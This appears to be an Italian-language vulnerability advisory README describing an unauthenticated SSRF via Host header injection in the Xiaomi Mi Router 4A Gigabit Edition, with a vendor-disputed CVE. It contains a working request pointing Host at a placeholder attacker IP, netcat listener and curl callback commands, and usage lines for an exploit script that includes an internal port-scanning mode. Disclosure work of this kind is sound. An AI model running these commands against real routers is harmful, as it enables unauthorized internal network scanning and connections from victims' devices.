
SSRF non autenticato in Xiaomi Mi Router 4A Gigabit Edition (firmware 3.0.24) tramite Host Header Injection — CVE-2026-26898
Una vulnerabilità di Server-Side Request Forgery (SSRF) esiste nello Xiaomi Mi Router 4A Gigabit Edition. L'interfaccia web del router non convalida l'header HTTP Host, consentendo a un attaccante non autenticato di forzare il router a effettuare connessioni TCP arbitrarie in uscita.
| Campo | Valore |
|---|
| Dispositivo | Xiaomi Mi Router 4A Gigabit Edition |
| Firmware | 3.0.24 (International) |
| CVE | CVE-2026-26898 (contestato — vedi Stato della Divulgazione sotto) |
| CWE | CWE-918 (Server-Side Request Forgery) |
| CVSS 3.1 | 8.6 (High) — valutazione del ricercatore; il fornitore contesta la gravità |
Stato: Contestato dal fornitore — questo report non è stato accettato da Xiaomi.
CVE-2026-26898 è usato qui solo per tracciamento; data la controversia con il fornitore, va trattato come contestato / non confermato, non confermato dal fornitore.
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444
# Terminale 1: Avvia listener
nc -l 4444
# Terminale 2: Invia richiesta malevola
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"
| File | Descrizione |
|---|---|
xiaomi_ssrf_exploit.py | Exploit completo con più modalità |
# Controlla se vulnerabile
python3 xiaomi_ssrf_exploit.py --target IP_ROUTER --check
# Modalità callback
python3 xiaomi_ssrf_exploit.py --target IP_ROUTER --callback TUO_IP --port 4444
# Scanner di porte
python3 xiaomi_ssrf_exploit.py --target IP_ROUTER --scan IP_TARGET --ports 22,23,80,443
| Data | Evento |
|---|---|
| 2026-01-15 | Vulnerabilità scoperta; PoC sviluppato |
| 2026-01-16 | Reportato a Xiaomi tramite HackerOne (#3513458) |
| 2026-01-23 | Xiaomi ha chiuso il report come Informativo (basso rischio, non verrà risolto) |
| 2026-06-03 | Advisory pubblico pubblicato (questo repository) — contestato dal fornitore, senza patch |
Questo exploit è fornito solo per scopi educativi e di test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale.
Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace